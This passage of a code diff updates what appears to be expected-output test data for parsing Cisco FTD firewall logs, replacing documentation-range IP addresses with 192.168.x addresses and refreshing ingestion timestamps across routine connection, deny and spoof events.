2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983121900Z", + "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, 
@@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768682100Z", - "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983127900Z", + "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768683600Z", - "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983133700Z", + "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" 
@@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768704400Z", - "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:35:10.983139500Z", + "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768707400Z", - "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:35:10.983145200Z", + "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, 
@@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768709600Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983150900Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768711300Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983155200Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, 
@@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768712900Z", - "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983158800Z", + "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768714400Z", + "ingested": "2021-12-09T13:35:10.983163200Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2822,8 +2822,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2863,7 +2863,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2871,8 +2871,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768717100Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:35:10.983168900Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", 
@@ -2899,8 +2899,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2940,7 +2940,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2948,8 +2948,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768718800Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:35:10.983173900Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2981,8 +2981,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3018,7 +3018,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3026,8 +3026,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768723600Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:35:10.983177900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -3043,7 +3043,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3061,8 +3061,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3098,7 +3098,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3106,8 +3106,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768725500Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:35:10.983182900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3123,7 +3123,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3141,8 +3141,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3177,7 +3177,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3188,8 +3188,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768727100Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:35:10.983186900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3222,8 +3222,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3258,7 +3258,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3269,8 +3269,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768728900Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:35:10.983191Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3303,8 +3303,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3339,7 +3339,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, 
@@ -3350,8 +3350,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768730900Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:35:10.983195300Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3384,8 +3384,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3414,7 +3414,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3423,8 +3423,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768732400Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:35:10.983199300Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3454,8 +3454,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3484,7 +3484,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3493,8 +3493,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768734Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:35:10.983203800Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3519,8 +3519,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3560,7 +3560,7 @@ ], "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -3568,8 +3568,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768735700Z", - "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:35:10.983209100Z", + "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3601,8 +3601,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3637,7 +3637,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3646,8 +3646,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768737500Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:35:10.983214200Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3663,7 +3663,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3681,8 +3681,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3717,7 +3717,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3726,8 +3726,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768739100Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:35:10.983218100Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -3743,7 +3743,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3761,8 +3761,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3797,7 +3797,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3808,8 +3808,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:22:01.768740700Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:35:10.983225100Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-09-07T12:22:01.768742300Z", + "ingested": "2021-12-09T13:35:10.983229900Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3909,8 +3909,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3940,7 +3940,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -3948,8 +3948,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768744400Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983233900Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3973,8 +3973,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4004,7 +4004,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4012,8 +4012,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768746Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983238Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4037,8 +4037,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4068,7 +4068,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -4076,8 +4076,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768747500Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983241500Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4101,8 +4101,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4132,7 +4132,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4140,8 +4140,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768749100Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983246100Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4165,8 +4165,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4196,7 +4196,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { 
@@ -4204,8 +4204,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768750600Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983249900Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4229,8 +4229,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4260,7 +4260,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4268,8 +4268,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768752200Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983254600Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768755200Z", + "ingested": "2021-12-09T13:35:10.983260400Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768756900Z", + "ingested": "2021-12-09T13:35:10.983266Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4427,8 +4427,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4462,7 +4462,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4471,8 +4471,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768758500Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:35:10.983271800Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-07T12:22:01.768760600Z", + "ingested": "2021-12-09T13:35:10.983277600Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768762200Z", + "ingested": "2021-12-09T13:35:10.983283300Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,15 +4628,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, 
